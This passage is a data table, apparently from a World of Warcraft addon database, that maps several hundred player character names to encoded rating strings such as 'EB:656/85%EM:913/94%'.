["Yakudza"] = "UB:295/36%RM:590/63%",
["Archon"] = "RB:513/71%EM:738/80%",
["Loona"] = "UM:274/37%",
["Inurdreams"] = "RB:427/72%EM:785/89%",
["Shanksînatra"] = "RM:211/50%",
["Ikotar"] = "LB:766/96%EM:716/76%",
["Stiñkfist"] = "CB:87/10%RM:555/59%",
["Naxtuul"] = "RB:446/61%EM:778/81%",
["Weeniehutjr"] = "EM:684/75%",
["Iolfear"] = "UM:264/27%",
["Jianjia"] = "CM:3/4%",
["Laoshuai"] = "UM:426/44%",
["Holydoc"] = "RB:371/53%EM:741/81%",
["Weakshady"] = "CM:71/9%",
["Justblast"] = "UB:330/44%RM:521/57%",
["Drdøtz"] = "UM:124/39%",
["Tharla"] = "CT:28/1%UM:299/31%",
["Mirrored"] = "CT:148/19%EB:656/85%EM:913/94%",
["Lynnwarlock"] = "CB:168/22%UM:136/41%",
["Sorrowtears"] = "EM:751/85%",
["Dinolock"] = "RB:391/53%UM:265/27%",
["Redkilmagegg"] = "UB:196/26%CM:83/7%",
["Cecelial"] = "CB:143/18%CM:135/19%",
["Goosegawd"] = "UT:339/47%EB:646/87%EM:898/94%",
["Unclesickle"] = "UT:219/28%CB:164/20%RM:491/54%",
["Icekeyboardz"] = "CT:52/12%EB:645/89%LM:937/97%",
["Wildspork"] = "CT:30/2%RB:458/58%RM:660/70%",
["Higheals"] = "UB:254/32%RM:551/61%",
["Thebully"] = "RT:169/61%EB:610/79%EM:765/80%",
["Shoktar"] = "RT:119/60%EB:497/75%RM:631/70%",
["Mlorb"] = "RT:62/53%UB:162/46%RM:357/63%",
["Bibij"] = "EB:629/86%SM:982/99%",
["Tinc"] = "RB:526/70%EM:761/82%",
["Cyr"] = "RB:482/65%UM:255/26%",
["Ezzyqt"] = "RB:492/68%EM:720/77%",
["Evesea"] = "RM:476/52%",
["Løckøut"] = "CT:64/8%RB:529/71%EM:861/89%",
["Tirne"] = "CT:41/12%UB:364/46%RM:702/73%",
["Lanaiyuqq"] = "LB:771/98%SM:985/99%",
["Neiine"] = "RB:427/58%EM:672/88%",
["Inumageshin"] = "EB:687/89%EM:860/90%",
["Sthephani"] = "UB:217/28%CM:49/5%",
["Corbinvo"] = "UT:77/30%EB:524/93%EM:914/94%",
["Bobbybouchér"] = "CM:8/0%",
["Fetteshuhn"] = "UM:410/44%",
["Ohshiz"] = "EM:649/75%",
["Trice"] = "UM:264/27%",
["Chipdad"] = "UB:240/32%RM:464/50%",
["Bacdorbandit"] = "RT:98/63%RB:183/62%EM:556/80%",
["Mantlar"] = "RT:198/65%EB:574/76%EM:407/75%",
["Drkblu"] = "CB:64/7%EM:709/75%",
["Crunchyy"] = "UM:111/36%",
["Clarice"] = "CT:150/19%RB:479/64%UM:315/37%",
["Yiz"] = "RB:536/71%EM:744/80%",
["Stuie"] = "RT:208/70%CB:89/10%UM:272/28%",
["Apostleash"] = "EB:685/91%EM:881/93%",
["Barbacoacles"] = "UB:337/41%RM:636/57%",
["Meimeei"] = "RB:488/65%EM:755/81%",
["Breshawah"] = "RB:373/74%",
["Equinsueocha"] = "UM:139/44%",
["Noxious"] = "UM:115/41%",
["Bjayzls"] = "CB:134/16%CM:34/3%",
["Foodmaker"] = "CT:55/6%CB:129/15%RM:489/53%",
["Sidiros"] = "RM:513/59%",
["Grinkly"] = "CB:62/6%",
["Sevyrd"] = "CB:82/9%",
["Pristique"] = "CM:45/5%",
["Maggyz"] = "CM:83/7%",
["Kasath"] = "CT:113/14%EB:591/77%RM:588/62%",
["Lyddy"] = "UT:196/25%RB:401/54%RM:601/64%",
["Autismoprime"] = "RB:332/74%RM:514/60%",
["Kuugi"] = "ET:654/85%EB:748/94%EM:851/88%",
["Shadydealerx"] = "RB:411/56%EM:852/90%",
["Sinm"] = "EB:667/85%EM:559/86%",
["Fancyfeet"] = "UM:86/33%",
["Respek"] = "UT:225/26%RB:462/63%EM:907/94%",
["Elffie"] = "CT:36/4%UB:370/46%EM:761/80%",
["Plonk"] = "RB:488/70%RM:628/69%",
["Darkywiz"] = "UM:130/44%",
["Squawker"] = "UT:78/36%EB:559/87%EM:615/82%",
["Emo"] = "CM:137/12%",
["Poprox"] = "RB:466/65%EM:761/82%",
["Vimproved"] = "EB:627/86%EM:842/90%",
["Beebrave"] = "CM:27/0%",
["Ushara"] = "UM:377/38%",
["Selmage"] = "RB:523/73%RM:574/67%",
["Hellrot"] = "EB:751/94%EM:843/87%",
["Steezys"] = "RM:590/61%",
["Steezey"] = "UT:224/29%EB:707/90%EM:857/88%",
["Diegosage"] = "CT:47/17%RB:402/53%EM:720/78%",
["Prosu"] = "EB:715/90%LM:937/95%",
["Wanky"] = "LB:772/97%LM:983/98%",
["Kryptos"] = "EB:692/88%EM:857/88%",
["Juwce"] = "EB:687/88%EM:844/87%",
["Katodanzo"] = "EB:750/94%EM:903/92%",
["Inked"] = "LB:780/97%LM:947/96%",
["Coolbutcute"] = "CT:54/18%EB:746/94%EM:864/89%",
["Rypken"] = "CB:68/6%CM:193/18%",
["Avadakedavr"] = "UM:420/45%",
["Challesta"] = "UM:338/33%",
["Sensiknight"] = "RM:530/56%",
["Bozoh"] = "UB:113/30%CM:27/0%",
["Rinxx"] = "CM:106/12%",
["Paranoids"] = "UM:269/27%",
["Frostbolting"] = "UB:278/35%RM:641/70%",
["Coots"] = "UM:444/48%",
["Tomfury"] = "EB:645/82%EM:799/83%",
["Silverman"] = "CB:187/23%RM:564/58%",
["Cchillbruhh"] = "UM:366/39%",
["Skat"] = "UB:371/44%UM:271/48%",
["Slobodan"] = "CB:37/3%UM:374/40%",
["Sivi"] = "RB:441/60%EM:745/81%",
["Athiest"] = "EB:547/76%EM:874/93%",
["Bigfrosty"] = "EB:411/84%EM:753/81%",
["Dracwarrior"] = "RM:674/72%",
["Melakar"] = "UM:252/25%",
["Thornypaws"] = "CT:57/8%LB:711/96%EM:841/94%",
["Hoofprints"] = "UT:193/39%UB:271/31%EM:762/88%",
["Prisonstyle"] = "UM:336/34%",
["Caronparis"] = "CB:60/5%UM:369/39%",
["Tracks"] = "LB:792/98%SM:997/99%",
["Jenk"] = "UT:191/25%LB:798/98%LM:964/97%",
["Bluevenom"] = "EB:693/89%EM:814/86%",
["Smoog"] = "LB:771/98%SM:1006/99%",
["Moolissa"] = "RB:317/69%EM:660/87%",
["Plaguis"] = "CT:47/10%EB:611/84%EM:738/81%",
["Narina"] = "UM:254/26%",
["Fonz"] = "EB:571/79%EM:751/82%",
["Penfifteen"] = "UB:231/28%EM:735/80%",
["Kselog"] = "RB:489/64%EM:799/83%",
["Raek"] = "UB:347/40%RM:700/74%",
["Stelex"] = "RT:208/67%EB:667/85%EM:871/90%",
["Hoju"] = "UB:319/42%UM:380/40%",
["Whitney"] = "CB:37/3%RM:167/51%",
["Skyrome"] = "CT:52/18%CM:131/18%",
["Fubo"] = "CB:151/16%RM:481/50%",
["Sleepyarrow"] = "RM:645/69%",
["Lokî"] = "UB:138/38%RM:513/56%",
["Jermzftw"] = "RB:483/62%RM:728/69%",
["Bobiboucher"] = "CM:203/20%",
["Cmilldruid"] = "EB:579/87%EM:640/82%",
["Mexicutioner"] = "EB:634/80%EM:779/82%",
["Cmillock"] = "RB:543/71%RM:548/56%",
["Getnmypocket"] = "CT:4/5%EB:568/78%LM:921/96%",
["Evillock"] = "UT:295/38%EB:628/81%RM:692/72%",
["Carvingtime"] = "EB:709/90%EM:806/84%",
["Airegin"] = "CB:85/10%UM:384/44%",
["Yujian"] = "CT:56/10%UB:330/43%CM:232/23%",
["Razh"] = "CB:39/4%RM:529/54%",
["Göldthorn"] = "UM:330/34%",
["Blingblink"] = "UM:284/29%",
["Shirokami"] = "CB:75/19%UM:321/36%",
["Sausmonky"] = "RB:512/68%RM:502/55%",
["Lolgaren"] = "UB:375/44%RM:600/64%",
["Yourfired"] = "RM:554/61%",
["Fershizzlers"] = "RB:543/72%CM:61/8%",
["Ayrial"] = "RT:182/64%LB:782/98%LM:945/96%",
["Deitý"] = "LB:784/98%LM:979/98%",
["Lilchubby"] = "UM:116/45%",
["Galaxia"] = "CT:29/5%LB:768/98%SM:984/99%",
["Beilor"] = "LB:735/97%LM:914/96%",
["Mcwrath"] = "UT:354/43%RB:469/67%RM:511/73%",
["Voxsap"] = "RB:421/53%RM:624/67%",
["Tylennol"] = "EB:581/77%EM:834/88%",
["Antirage"] = "SB:851/99%LM:956/97%",
["Platronix"] = "UB:250/31%CM:228/22%",
["Notdeadmatt"] = "UB:297/33%CM:191/20%",
["Possiblyzo"] = "EB:613/88%EM:842/93%",
["Hardrotation"] = "RB:458/61%EM:753/81%",
["Jøeexotic"] = "RM:515/54%",
["Frombeehind"] = "RB:416/52%UM:444/47%",
["Kosa"] = "CT:47/5%RB:528/70%RM:546/60%",
["Elenthera"] = "EB:689/92%LM:922/96%",
["Wellmet"] = "EB:649/88%LM:952/97%",
["Adamage"] = "EB:732/93%EM:914/94%",
["Jovovich"] = "EB:628/81%RM:586/63%",
["Washyurback"] = "CT:77/22%RB:392/53%RM:598/66%",
["Pounder"] = "RB:430/55%RM:517/55%",
["Xerra"] = "EB:680/92%EM:834/90%",
["Mandragorin"] = "LB:748/95%LM:921/95%",
["Kalitoris"] = "LB:738/97%EM:860/92%",
["Aurai"] = "EB:741/93%EM:881/91%",
["Bloon"] = "LB:776/98%LM:915/97%",
["Ifearia"] = "RB:522/72%RM:556/61%",
["Thibalex"] = "ET:709/91%LB:791/98%LM:953/96%",
["Badidea"] = "LB:784/98%LM:993/98%",
["Dyze"] = "LB:760/95%SM:1002/99%",
["Paralytic"] = "LB:764/96%LM:949/96%",
["Datsun"] = "UB:221/28%RM:697/71%",
["Shyme"] = "RM:655/72%",
["Thejudge"] = "RB:423/56%LM:991/98%",
["Tkdk"] = "UB:357/48%UM:236/27%",
["Nanase"] = "UB:173/41%RM:595/64%",
["Milldeadshot"] = "CT:51/18%EB:596/78%RM:680/72%",
["Roxannd"] = "CB:130/16%CM:142/13%",
["Vav"] = "CT:71/6%EB:568/78%EM:769/83%",
["Notzinfinkin"] = "EB:458/78%RM:361/66%",
["Lsdxtc"] = "EB:729/92%EM:802/83%",
["Flakes"] = "CB:129/15%RM:513/55%",
["Liluzivert"] = "UB:372/46%EM:833/81%",
["Drewbydoo"] = "CM:4/4%",
["Ezclass"] = "RB:552/72%EM:857/88%",
["Hotsummer"] = "EB:533/80%EM:758/87%",
["Casters"] = "EB:594/83%RM:679/74%",
["Marcocius"] = "UT:78/27%RB:517/67%EM:724/75%",
["Shroomhigh"] = "EB:583/77%EM:907/93%",
["Stankmyster"] = "RM:544/56%",
["Torok"] = "UM:279/28%",
["Milkyrips"] = "RB:511/65%EM:806/84%",
["Kilrong"] = "RM:554/59%",
["Chenshiyi"] = "LB:781/98%LM:924/95%",
["Erebuss"] = "UT:343/43%RB:466/67%CM:214/20%",
["Setoto"] = "UT:258/31%LB:760/98%LM:934/97%",
["Tofudaily"] = "RB:515/68%RM:637/70%",
["Bebup"] = "CM:31/1%",
["Clipee"] = "UM:308/31%",
["Levane"] = "EM:862/86%",
["Coalrogue"] = "LM:950/95%",
["Metroboomkin"] = "EB:592/87%LM:927/97%",
["Fortyninerz"] = "RB:475/60%UM:458/48%",
["Lass"] = "RB:216/53%RM:593/63%",
["Boombayah"] = "LB:775/97%LM:954/97%",
["Captrogers"] = "RB:493/62%EM:717/76%",
["Dezertcoyote"] = "EB:588/77%EM:712/75%",
["Corise"] = "UM:126/44%",
["Rockl"] = "RM:540/57%",
["Thundercat"] = "UT:255/34%EB:555/77%EM:897/94%",
["Hauj"] = "UB:392/49%RM:670/71%",
["Wolverinos"] = "CM:113/13%",
["Ziggazang"] = "LB:784/98%LM:967/97%",
["Twohands"] = "RB:570/73%EM:915/93%",
["Martog"] = "RB:568/72%EM:808/84%",
["Slamarchy"] = "RM:661/71%",
["Brasky"] = "EB:594/83%EM:793/89%",
["Vanillabella"] = "EB:626/86%EM:815/88%",
["Notfun"] = "UM:299/31%",
["Snarfsnarf"] = "UB:320/42%EM:676/75%",
["Guren"] = "RB:441/56%RM:610/65%",
["Pröxy"] = "EB:697/92%EM:894/94%",
["Karhu"] = "EB:670/92%LM:918/97%",
["Fatherrey"] = "EB:564/78%EM:844/91%",
["Diggla"] = "EB:616/78%EM:926/94%",
["Chuckofdoom"] = "RB:485/62%EM:822/85%",
["Frosted"] = "EB:630/82%RM:621/68%",
["Tritan"] = "EB:735/94%LM:945/97%",
["Manblock"] = "CT:76/16%RB:491/65%RM:534/73%",
["Ashwilliams"] = "CB:185/23%UM:331/33%",
["Safetybelt"] = "EM:607/78%",
["Icanhelp"] = "UB:344/46%EM:821/87%",
["Thekrusher"] = "CB:120/13%UM:364/37%",
["Fishdonuts"] = "RB:428/56%RM:559/61%",
["Ksimon"] = "EM:740/80%",
["Ironwyatt"] = "RB:499/69%RM:641/71%",
["Annehathaway"] = "CM:207/20%",
["Vulfxx"] = "CM:89/7%",
["Isaah"] = "EB:628/80%EM:764/80%",
["Asheru"] = "LB:755/95%LM:956/97%",
["Infiernus"] = "UB:234/29%UM:432/47%",
["Frostitooth"] = "EB:730/93%EM:908/94%",
["Insek"] = "EB:661/83%EM:775/81%",
["Retset"] = "RB:469/64%EM:814/87%",
["Zinglese"] = "EB:706/89%EM:908/93%",
["Aiyamaya"] = "SB:800/99%LM:971/98%",
["Matthew"] = "RT:534/70%EB:553/76%EM:825/86%",
["Ethanbud"] = "EB:739/93%EM:807/84%",
["Mooji"] = "LB:755/95%EM:805/84%",
["Farage"] = "LT:463/96%LB:788/98%EM:891/94%",
["Seanbudz"] = "CB:144/16%RM:643/71%",
["Apologizing"] = "CB:152/19%UM:247/25%",
["Jcaard"] = "EB:569/78%EM:739/77%",
["Daltyn"] = "RM:665/71%",
["Quilk"] = "EB:714/94%EM:876/92%",
["Decimator"] = "RB:468/65%UM:295/30%",
["Oryc"] = "UT:123/47%RB:390/51%RM:486/51%",
["Olific"] = "EB:693/93%LM:910/95%",
["Gitbeda"] = "RM:267/56%",
["Mobbin"] = "EB:626/86%LM:949/98%",
["Thuggin"] = "LB:739/96%LM:949/97%",
["Gretagotagun"] = "UM:268/26%",
["Onlooker"] = "RB:494/69%RM:528/58%",
["Eugenekrabs"] = "RB:576/73%EM:738/78%",
["Teacherwang"] = "CB:110/13%CM:192/18%",
["Evilspy"] = "EB:706/89%EM:917/93%",
["Phobo"] = "EB:580/75%EM:870/90%",
["Flexurass"] = "RB:516/66%UM:452/48%",
["Lunori"] = "EM:563/78%",
["Asúná"] = "LB:719/95%LM:936/96%",
["Tmillzmage"] = "RT:174/62%EB:628/82%EM:863/90%",
["Hildog"] = "CB:30/1%",
["Aventus"] = "CT:43/17%",
["Khìone"] = "CT:29/12%UM:75/29%",
["Angelasister"] = "UB:211/26%UM:395/42%",
["Kipz"] = "EM:866/91%",
["Proficiency"] = "CM:31/1%",
["Soltrekjin"] = "RM:621/68%",
["Nekrana"] = "RB:526/69%RM:706/69%",
["Moghedíen"] = "CT:27/3%RB:301/70%RM:474/52%",
["Backdräft"] = "CB:79/10%",
["Majëstic"] = "RM:586/74%",
["Frostafina"] = "CM:229/23%",
["Tronix"] = "RM:515/56%",
["Jittërs"] = "EB:631/83%EM:886/92%",
["Tsarbomba"] = "UB:255/34%EM:413/82%",
["Drenn"] = "EB:668/90%EM:883/93%",
["Brianlefevre"] = "UT:77/35%CB:40/3%CM:123/11%",
["Dripd"] = "LB:752/95%EM:833/86%",
["Ttotheotem"] = "CT:165/19%EB:618/84%RM:622/69%",
["Asumaka"] = "UM:323/34%",
["Fany"] = "CB:80/10%UM:366/45%",
["Larryfisher"] = "CB:57/5%CM:4/0%",
["Sargaseosea"] = "CM:69/5%",
["Schrute"] = "RT:433/57%RB:470/66%UM:448/49%",
["Sneed"] = "CM:63/8%",
["Lyfjaberg"] = "CT:147/16%CB:164/18%RM:459/53%",
["Mirazi"] = "CB:38/4%UM:250/25%",
["Millzz"] = "LT:524/97%EB:700/89%EM:886/91%",
["Goslinggawd"] = "UB:252/33%RM:583/64%",
["Chillcosby"] = "CB:47/5%",
["Gsanvip"] = "CM:29/9%",
["Tokenhealer"] = "RB:362/51%",
["Xaitric"] = "CM:175/22%",
["Kentoshi"] = "CT:65/22%EB:606/77%RM:658/70%",
["Sellene"] = "CT:102/13%EB:621/82%EM:791/77%",
["Pundax"] = "EB:655/89%EM:770/86%",
["Letta"] = "UB:278/37%RM:676/70%",
["Abaddonn"] = "RT:162/56%CM:156/16%",
["Bloodsmage"] = "RT:484/64%CB:141/18%EM:705/77%",
["Frontier"] = "RB:479/66%EM:788/85%",
["Youcantmove"] = "CM:192/18%",
["Abahboy"] = "RB:493/69%UM:407/48%",
["Slîme"] = "CT:1/2%RB:460/74%RM:483/70%",
["Ssnow"] = "RT:182/62%CB:116/14%UM:262/31%",
["Vodkabelly"] = "EB:707/89%EM:875/89%",
["Dháin"] = "EB:600/76%RM:610/65%",
["Steef"] = "EB:648/89%EM:851/91%",
["Combopoints"] = "EB:722/91%EM:845/87%",
["Blaizy"] = "EB:737/92%EM:898/91%",
["Kannen"] = "EB:731/92%EM:891/91%",
["Volonino"] = "LB:759/95%EM:928/94%",
["Ramathor"] = "EB:735/92%LM:945/96%",
["Roguemagnet"] = "UM:252/49%",
["Bimbobobby"] = "EB:565/75%EM:736/80%",
["Anathem"] = "RB:509/70%RM:581/64%",
["Hholmes"] = "CB:61/6%RM:490/51%",
["Sukmyfkndag"] = "CM:110/14%",
["Klik"] = "RB:483/62%RM:613/66%",
["Broskiballa"] = "RB:446/68%EM:603/78%",
["Tainting"] = "UB:240/32%UM:338/34%",
["Pantherzz"] = "RT:505/66%EB:694/87%RM:700/74%",
["Ouwen"] = "UT:337/45%EB:631/82%EM:709/75%",
["Swoleington"] = "UB:233/25%RM:603/54%",
["Warmbank"] = "UB:303/38%UM:430/44%",
["Snoopyhunter"] = "RB:527/69%EM:826/85%",
["Inny"] = "EB:753/94%EM:862/89%",
["Okh"] = "EB:703/89%EM:863/89%",
["Saintjimmy"] = "CB:82/9%CM:117/10%",
["Wifisenpai"] = "RB:421/59%RM:600/70%",
["Thexus"] = "RM:685/63%",
["Eatassallday"] = "CB:109/12%CM:40/15%",
["Fattymash"] = "CT:48/19%RB:492/62%RM:554/59%",
["Telthus"] = "CM:96/8%",
["Shiftycapone"] = "RT:88/69%LB:766/98%SM:972/99%",
["Ity"] = "RB:249/61%EM:691/75%",
["Quietkeep"] = "CT:29/6%UB:148/36%RM:623/67%",
["Smðke"] = "RB:527/70%EM:894/93%",
["Hijynx"] = "RT:520/68%EB:724/92%EM:928/94%",
["Knah"] = "EB:746/94%SM:1051/99%",
["Sharius"] = "UT:123/47%RB:437/57%RM:574/61%",
["Dkpoacher"] = "EB:539/81%EM:712/85%",
["Kazzule"] = "LB:755/95%EM:882/90%",
["Azelofe"] = "CM:53/19%",
["Ginjabeard"] = "CB:41/5%",
["Klipsis"] = "UT:78/30%EB:543/94%LM:893/95%",
["Frothsbeard"] = "SB:799/99%LM:967/97%",
["Krea"] = "CB:200/24%EM:788/77%",
["Btaa"] = "CB:55/3%UM:325/38%",
["Dooki"] = "EB:587/77%EM:832/88%",
["Jenetyk"] = "EB:747/94%LM:948/96%",
["Casperagoat"] = "CM:39/3%",
["Kden"] = "CB:33/2%CM:192/19%",
["Savorybeans"] = "LB:761/95%EM:911/93%",
["Thasos"] = "RB:452/62%EM:810/88%",
["Hamhamham"] = "EB:708/90%EM:766/80%",
["Tyranoid"] = "UB:383/46%RM:499/53%",
["Kindnut"] = "UB:234/29%RM:380/57%",
["Dd"] = "CB:166/20%CM:207/20%",
["Pint"] = "RB:411/54%LM:943/95%",
["Jonzy"] = "RB:511/65%RM:654/70%",
["Venorika"] = "CM:43/2%",
["Missionboi"] = "LB:766/96%EM:903/92%",
["Tassiden"] = "UT:381/47%EB:701/92%EM:743/81%",
["Jz"] = "EB:626/86%EM:880/93%",
["Grizzmage"] = "LM:941/95%",
["Myth"] = "EB:669/90%EM:880/92%",
["Stazi"] = "EB:734/92%EM:813/85%",
["Skorne"] = "EB:743/93%LM:960/96%",
["Coffeecrew"] = "CB:194/24%RM:663/73%",
["Wehs"] = "EB:700/88%EM:741/78%",
["Moomoo"] = "EB:589/88%EM:779/90%",
["Zhenki"] = "RB:440/56%RM:679/72%",
["Subcelcius"] = "CM:218/21%",
["Dîrtbag"] = "RM:502/51%",
["Makos"] = "RB:448/57%RM:508/54%",
["Titanorth"] = "RM:307/62%",
["Mouse"] = "RT:97/63%EB:527/84%EM:764/91%",
["Pikatchu"] = "RB:307/71%RM:550/60%",
["Graz"] = "UB:155/39%RM:602/62%",
["Twistedshots"] = "UB:273/34%UM:165/48%",
["Venknee"] = "EB:684/88%EM:893/92%",
["Karv"] = "RM:694/74%",
["Xiquan"] = "CM:35/2%",
["Biubiubiuo"] = "EB:625/86%EM:794/85%",
["Wenge"] = "CB:41/4%UM:297/30%",
["Coralina"] = "LB:708/95%EM:824/89%",
["Rbwarlock"] = "EB:722/91%EM:920/94%",
["Andok"] = "UM:297/30%",
["Santaa"] = "UT:238/31%EB:726/92%EM:831/88%",
["Ebôlt"] = "CB:28/2%UM:377/39%",
["Idtd"] = "LT:781/98%LB:706/97%LM:949/96%",
["Stabracadabr"] = "UM:461/49%",
["Willywonká"] = "EB:499/79%LM:926/97%",
["Normabatess"] = "UM:249/25%",
["Deadlynaya"] = "CM:40/3%",
["Manamann"] = "CM:210/20%",
["Eitga"] = "EB:596/76%EM:755/80%",
["Bortreynolds"] = "UB:197/25%UM:384/43%",
["Mydashkey"] = "EB:726/92%LM:967/97%",
["Shakazulue"] = "EM:611/75%",
["Magikaca"] = "UM:453/46%",
["Len"] = "CT:49/12%RB:220/50%EM:491/84%",
["Dul"] = "UB:213/26%RM:575/59%",
["Trillshifts"] = "CB:92/9%UM:441/48%",
["Uvw"] = "EM:766/82%",
["Voul"] = "EB:736/92%EM:923/94%",
["Jodai"] = "CM:62/8%",
["Mallokai"] = "UM:422/45%",
["Miyoshi"] = "CM:38/2%",
["Cptpwn"] = "UM:301/30%",
["Hyoriin"] = "EB:580/77%EM:689/75%",
["Frostthree"] = "CM:21/5%",
["Spriest"] = "RB:208/58%RM:468/65%",
["Juicysquirtx"] = "RM:497/53%",
["Milkydubz"] = "SB:836/99%LM:950/96%",
["Holyharry"] = "EB:741/94%EM:872/91%",
["Consta"] = "UB:202/25%UM:296/30%",
["Stenman"] = "EB:663/84%EM:721/76%",
["Crunkenstein"] = "UB:376/48%RM:538/55%",
["Loperia"] = "EB:697/90%EM:808/86%",
["Abah"] = "UB:231/29%UM:312/31%",
["Rooike"] = "UB:249/31%RM:549/60%",
["Valarîs"] = "RB:547/73%RM:679/73%",
["Xan"] = "RT:415/57%LB:762/96%LM:968/97%",
["Pinklilly"] = "CB:28/0%CM:38/2%",
["Mackensey"] = "EB:652/82%EM:889/91%",
["Zeja"] = "EB:576/75%RM:679/72%",
["Ult"] = "EB:689/87%EM:847/87%",
["Uape"] = "EB:631/80%RM:677/72%",
["Lusion"] = "UM:317/33%",
["Frostykarn"] = "RM:632/69%",
["Frostyfranky"] = "CM:134/12%",
["Mewmix"] = "RM:649/72%",
["Moistspot"] = "SB:818/99%SM:1025/99%",
["Dumptheclip"] = "EB:686/87%RM:700/74%",
["Searusbuffs"] = "UB:238/30%RM:469/51%",
["Allev"] = "EB:633/91%EM:632/83%",
["Gnominaround"] = "EB:695/89%EM:844/89%",
["Xyith"] = "EB:692/93%EM:869/92%",
["Serenata"] = "RM:343/56%",
["Skeetonyrmom"] = "EB:693/88%EM:816/85%",
["Roflmaaoo"] = "EB:734/92%EM:824/86%",
["Forsakendot"] = "RB:541/72%RM:187/50%",
["Seroshift"] = "RM:425/71%",
["Drdayman"] = "RB:453/60%UM:438/47%",
["Sobersucks"] = "EB:709/89%LM:942/95%",
["Stickxd"] = "CT:114/14%EB:700/89%EM:858/88%",
["Wetpaperbag"] = "CB:120/13%UM:301/30%",
["Baxxter"] = "LB:775/97%LM:965/97%",
["Lazylol"] = "EB:706/91%EM:832/88%",
["Dram"] = "EB:567/78%RM:616/68%",
["Twopack"] = "RB:463/59%EM:846/87%",
["Doofy"] = "LB:755/95%EM:891/91%",
["Pupdoee"] = "UB:280/39%UM:362/38%",
["Kaysia"] = "EB:557/77%EM:711/78%",
["Xuexue"] = "SB:863/99%SM:1044/99%",
["Amahso"] = "SB:821/99%SM:1024/99%",
["Chronalis"] = "CM:40/3%",
["Trapocolypse"] = "UB:393/47%RM:677/72%",
["Fragility"] = "RM:444/53%",
["Viporius"] = "UB:343/43%RM:543/56%",
["Shaftsnap"] = "CB:108/13%UM:353/36%",
["Abovethelaw"] = "LB:797/98%LM:958/97%",
["Serenitas"] = "EB:648/83%UM:373/38%",
["Bigchiller"] = "UM:442/48%",
["Treehuggins"] = "LB:726/95%EM:907/94%",
["Tewbookoo"] = "LB:766/96%EM:853/87%",
["Nohealsforu"] = "UB:151/46%RM:253/55%",
["Lonnylasagne"] = "CB:97/9%EM:827/89%",
["Samhabhae"] = "RB:461/63%EM:785/85%",
["Aenloth"] = "UB:323/40%RM:677/72%",
["Bloodyjuice"] = "EB:664/89%EM:883/94%",
["Mythrodiir"] = "UB:133/33%UM:202/49%",
["Deezz"] = "LB:620/95%EM:892/92%",
["Healforsale"] = "ET:582/77%EB:663/92%SM:968/99%",
["Etheriss"] = "EB:576/75%EM:734/76%",
["Aoesalot"] = "RB:548/73%EM:793/85%",
["Bluelizard"] = "CB:76/7%CM:26/0%",
["Quantumflux"] = "RM:422/69%",
["Banksamdi"] = "UM:390/39%",
["Ædruid"] = "CB:14/8%LM:924/97%",
["Kcarbray"] = "EB:661/89%EM:780/84%",
["Backsurgeon"] = "CM:237/24%",
["Quie"] = "CB:150/18%UM:277/27%",
["Acantha"] = "CM:197/18%",
["Lohne"] = "UM:274/28%",
["Kashai"] = "UB:291/37%RM:511/56%",
["Haidel"] = "UM:144/47%",
["Kryptoregen"] = "CM:189/18%",
["Kyoda"] = "RM:678/72%",
["Spookboys"] = "RB:450/59%UM:362/38%",
["Kellesta"] = "EB:485/80%EM:502/75%",
["Lundberg"] = "EB:652/89%EM:889/93%",
["Wizzlebang"] = "RB:554/72%RM:557/57%",
["Shfear"] = "RM:496/53%",
["Snickers"] = "UM:377/40%",
["Smokethetree"] = "LB:758/95%LM:938/95%",
["Demonics"] = "CM:136/14%",
["Grubhoof"] = "UB:239/30%RM:667/74%",
["Drjekyll"] = "EB:750/94%EM:921/94%",
["Titaneea"] = "CB:50/5%",
["Phodacbiet"] = "UB:294/40%RM:553/61%",
["Flexacute"] = "SB:801/99%LM:971/97%",
["Spacemanspif"] = "UM:407/44%",
["Drynoodles"] = "UM:119/38%",
["Whiskeyd"] = "UB:199/25%EM:509/88%",
["Natrome"] = "CB:128/14%",
["Jdpowah"] = "EB:735/93%LM:975/98%",
["Selkies"] = "RB:419/57%EM:824/82%",
["Feralator"] = "EB:488/83%EM:563/79%",
["Ponder"] = "EM:832/86%",
["Tonkuhz"] = "RB:537/71%EM:785/82%",
["Lithra"] = "UB:242/30%RM:564/58%",
["Cmd"] = "UB:235/25%RM:688/63%",
["Frostybudz"] = "CM:37/2%",
["Dory"] = "CB:85/21%CM:31/1%",
["Laura"] = "CB:76/7%SM:992/99%",
["Snootboop"] = "CM:234/24%",
["Wangotango"] = "CB:72/8%EM:770/81%",
["Xanoks"] = "CM:112/13%",
["Notzero"] = "RB:415/57%RM:597/62%",
["Arcyn"] = "RM:490/50%",
["Thestubs"] = "RM:605/66%",
["Spoopylock"] = "CB:154/19%UM:447/45%",
["Azyriel"] = "CB:67/18%UM:421/43%",
["Freddiequell"] = "EB:715/90%LM:937/95%",
["Tummy"] = "EB:584/86%EM:838/93%",
["Bladerunning"] = "EB:623/87%LM:900/95%",
["Kangarkaya"] = "UB:224/28%UM:428/43%",
["Audizz"] = "CM:29/1%",
["Bjbjb"] = "CT:88/10%LB:758/96%LM:926/95%",
["Blackz"] = "RB:402/54%EM:598/89%",
["Ezdieyin"] = "EB:634/80%EM:835/87%",
["Lanmage"] = "CT:72/8%UB:243/31%EM:730/79%",
["Juchan"] = "LB:761/96%LM:970/98%",
["Lucicille"] = "CB:60/6%UM:288/29%",
["Paranoid"] = "EM:825/87%",
["Wonzy"] = "EB:749/94%SM:1016/99%",
["Ashuraya"] = "UM:345/36%",
["Jgone"] = "CB:54/12%UM:344/36%",
["Jespina"] = "CM:141/12%",
["Ratata"] = "RB:472/60%EM:760/79%",
["Orfeofour"] = "CM:5/7%",
["Niçk"] = "UM:364/38%",
["Inulockshin"] = "EB:698/89%EM:806/84%",
["Affection"] = "UM:429/46%",
["Raycen"] = "RM:475/52%",
["Acale"] = "UB:234/30%EM:829/84%",
["Vanish"] = "LB:761/95%EM:805/83%",
["Shuruppak"] = "CB:49/5%",
["Baldfully"] = "UM:90/28%",
["Jerryrandy"] = "RT:150/55%RB:420/56%RM:290/64%",
["Kennypowers"] = "ET:290/85%UB:180/46%RM:588/57%",
["Mcdarnit"] = "UT:227/30%RB:226/56%",
["Moncada"] = "RT:436/60%EB:373/75%RM:617/66%",
["Jiren"] = "EB:592/75%EM:877/90%",
["Shadowtank"] = "EM:576/84%",
["Mingjuan"] = "RT:29/54%UB:284/36%EM:776/84%",
["Saltysnipez"] = "CB:64/7%RM:603/66%",
["Saxxramas"] = "CB:38/4%UM:146/48%",
["Jsnac"] = "EB:726/94%EM:842/92%",
["Bil"] = "ET:460/80%EB:588/85%EM:628/80%",
["Tromos"] = "CB:74/9%UM:455/48%",
["Ozera"] = "CM:35/9%",
["Crimsin"] = "UT:82/29%CB:132/16%UM:236/28%",
